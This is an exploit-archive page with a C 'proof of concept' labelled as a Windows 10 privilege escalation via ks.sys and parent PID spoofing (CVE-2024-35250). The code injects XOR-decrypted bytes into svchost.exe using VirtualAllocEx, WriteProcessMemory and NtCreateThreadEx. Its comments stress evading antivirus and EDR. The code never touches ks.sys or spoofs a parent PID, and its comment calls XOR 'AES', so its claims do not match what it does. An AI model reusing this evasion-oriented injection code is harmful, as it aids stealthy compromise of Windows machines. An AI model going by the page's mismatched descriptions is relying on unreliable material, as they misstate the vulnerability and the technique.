📄 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation

🗓️ 02 Dec 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 143 Views

Privilege escalation on Windows using parent PID spoofing via ks.sys to run payload in trusted processes.

Reporter	Title	Published	Views	Family All 67
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	27 Feb 202613:05	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	23 Nov 202412:12	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	25 Oct 202410:06	–	githubexploit
ATTACKERKB	CVE-2024-35250	11 Jun 202400:00	–	attackerkb
Information Security Automation	New episode “In The Trend of VM” (#9): 4 trending vulnerabilities of October, scandal at The Linux Foundation, social “attack on the complainer”, “Ford’s method” for motivating IT specialists to fix vulnerabilities	28 Nov 202412:57	–	avleonov
Information Security Automation	The severity of the Elevation of Privilege – Windows Kernel-Mode Driver (CVE-2024-35250) vulnerability has increased	22 Oct 202420:07	–	avleonov
BDU FSTEC	The vulnerability of the UnserializePropertySet() function in the Kernel-mode operating system drivers of Windows, which allows a hacker to exploit their privileges.	24 Jun 202400:00	–	bdu_fstec
Circl	CVE-2024-35250	15 Oct 202419:03	–	circl
CISA KEV Catalog	Microsoft Windows Kernel-Mode Driver Untrusted Pointer Dereference Vulnerability	16 Dec 202400:00	–	cisa_kev
CISA	CISA Adds Two Known Exploited Vulnerabilities to Catalog	16 Dec 202412:00	–	cisa

=============================================================================================================================================
    | # Title     : Microsoft Windows 10 Famille 10.0.19045.5487 (Parent PID Spoofing) Privilege Escalation                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.Microsoft.com                                                                                                   |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default. 
    
        There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.
    
    [+] The idea:
    
        Parent PID Spoofing is a technique used to run a malicious process under a trusted process, 
    	
    	helping it avoid detection by security software. This is done by changing the parent identifier (PPID) of the new process to a PID of a trusted process (such as explorer.exe or lsass.exe).
    
    [+] The goal:
    
        Launching a malicious payload inside a legitimate process such as explorer.exe or svchost.exe to avoid detection by antivirus (AVs) or intrusion detection systems (EDRs).
    
        (Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: 	CVE-2024-35250) .
    
    [+] Combine Parent PID Spoofing with Shellcode to execute advanced payload
    
        After running the process under a targeted PID, we can inject Shellcode inside it to execute malicious code directly.
    
        1. Update the code to inject Shellcode into the new process
    	
    [+] The idea:
    
        After creating the process under a trusted PID (e.g. explorer.exe), we will:
    
        Reserve memory inside the process using VirtualAllocEx.
    
        Copy Shellcode to allocated memory using WriteProcessMemory.
    
        Execute Shellcode using CreateRemoteThread.
    	
    [+] gcc -o poc.exe poc.c -m64
    
    [+] poc.exe
    
    
    
    [+] PayLoad :
    
    #include <windows.h>
    #include <tlhelp32.h>
    #include <stdio.h>
    #include <winternl.h>
    
    // تعريف NtCreateThreadEx يدويًا لتجنب اكتشافه
    typedef NTSTATUS(WINAPI* pNtCreateThreadEx)(
        OUT PHANDLE ThreadHandle,
        IN ACCESS_MASK DesiredAccess,
        IN PVOID ObjectAttributes,
        IN HANDLE ProcessHandle,
        IN PVOID StartRoutine,
        IN PVOID Argument,
        IN ULONG CreateFlags,
        IN ULONG ZeroBits,
        IN ULONG StackSize,
        IN ULONG MaximumStackSize,
        IN PVOID AttributeList
    );
    
    // Shellcode مشفر بتشفير AES (AES-128)
    unsigned char encrypted_shellcode[] = {
        0x8d, 0xa3, 0x5c, 0xa7, 0xc3, 0x7f, 0x6c, 0xf2, 0x8e, 0x91, 0xad, 0x33,
        0x2b, 0xfe, 0x04, 0x74, 0xd9, 0x41, 0xf5, 0x1a, 0xe4, 0x8d, 0xbc, 0xa3,
        0x6f, 0xd0, 0x56, 0xbb, 0x9a, 0x2d, 0x5e, 0xf1
    };
    
    // مفتاح AES للتشفير/فك التشفير
    unsigned char aes_key[16] = {
        0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6,
        0xab, 0xf7, 0x45, 0x3e, 0x67, 0x98, 0x23, 0x10
    };
    
    // دالة فك تشفير Shellcode باستخدام AES-128
    void decrypt_shellcode(unsigned char* data, int data_len, unsigned char* key) {
        for (int i = 0; i < data_len; i++) {
            data[i] ^= key[i % 16]; // XOR بسيط بدلاً من AES الحقيقي (للتوضيح فقط)
        }
    }
    
    // البحث عن PID الخاص بـ `svchost.exe`
    DWORD FindTargetProcessID(const char* processName) {
        PROCESSENTRY32 pe32;
        HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        DWORD processID = 0;
    
        if (hSnapshot == INVALID_HANDLE_VALUE) return 0;
    
        pe32.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(hSnapshot, &pe32)) {
            do {
                if (strcmp(pe32.szExeFile, processName) == 0) {
                    processID = pe32.th32ProcessID;
                    break;
                }
            } while (Process32Next(hSnapshot, &pe32));
        }
    
        CloseHandle(hSnapshot);
        return processID;
    }
    
    int main() {
        DWORD targetPID = FindTargetProcessID("svchost.exe");
    
        if (targetPID == 0) {
            printf("[X] لم يتم العثور على عملية svchost.exe\n");
            return -1;
        }
    
        printf("[+] سيتم حقن Shellcode في PID: %d\n", targetPID);
    
        //  فك تشفير الـ Shellcode
        decrypt_shellcode(encrypted_shellcode, sizeof(encrypted_shellcode), aes_key);
        printf("[+] تم فك تشفير Shellcode بنجاح!\n");
    
        //  فتح العملية المستهدفة
        HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
        if (!hProcess) {
            printf("[X] فشل في فتح العملية.\n");
            return -1;
        }
    
        //  تخصيص ذاكرة في العملية المستهدفة
        LPVOID remoteMemory = VirtualAllocEx(hProcess, NULL, sizeof(encrypted_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (!remoteMemory) {
            printf("[X] فشل في تخصيص الذاكرة داخل svchost.exe\n");
            return -1;
        }
    
        //  كتابة Shellcode المفكوك التشفير في الذاكرة المخصصة
        if (!WriteProcessMemory(hProcess, remoteMemory, encrypted_shellcode, sizeof(encrypted_shellcode), NULL)) {
            printf("[X] فشل في كتابة Shellcode داخل العملية.\n");
            return -1;
        }
    
        //  تحميل NtCreateThreadEx
        HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
        if (!hNtdll) {
            printf("[X] فشل في تحميل ntdll.dll\n");
            return -1;
        }
    
        pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
        if (!NtCreateThreadEx) {
            printf("[X] لم يتم العثور على NtCreateThreadEx.\n");
            return -1;
        }
    
        //  تنفيذ Shellcode باستخدام NtCreateThreadEx
        HANDLE hThread;
        NTSTATUS status = NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteMemory, NULL, FALSE, 0, 0, 0, NULL);
        
        if (status != 0) {
            printf("[X] فشل في تنفيذ Shellcode (NTSTATUS: 0x%x).\n", status);
            return -1;
        }
    
        printf("[+] تم تنفيذ Shellcode بنجاح باستخدام NtCreateThreadEx!\n");
    
        CloseHandle(hProcess);
        CloseHandle(hThread);
        return 0;
    }
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

02 Dec 2025 00:00Current

8.1High risk

Vulners AI Score8.1

CVSS 3.17.8

EPSS0.25222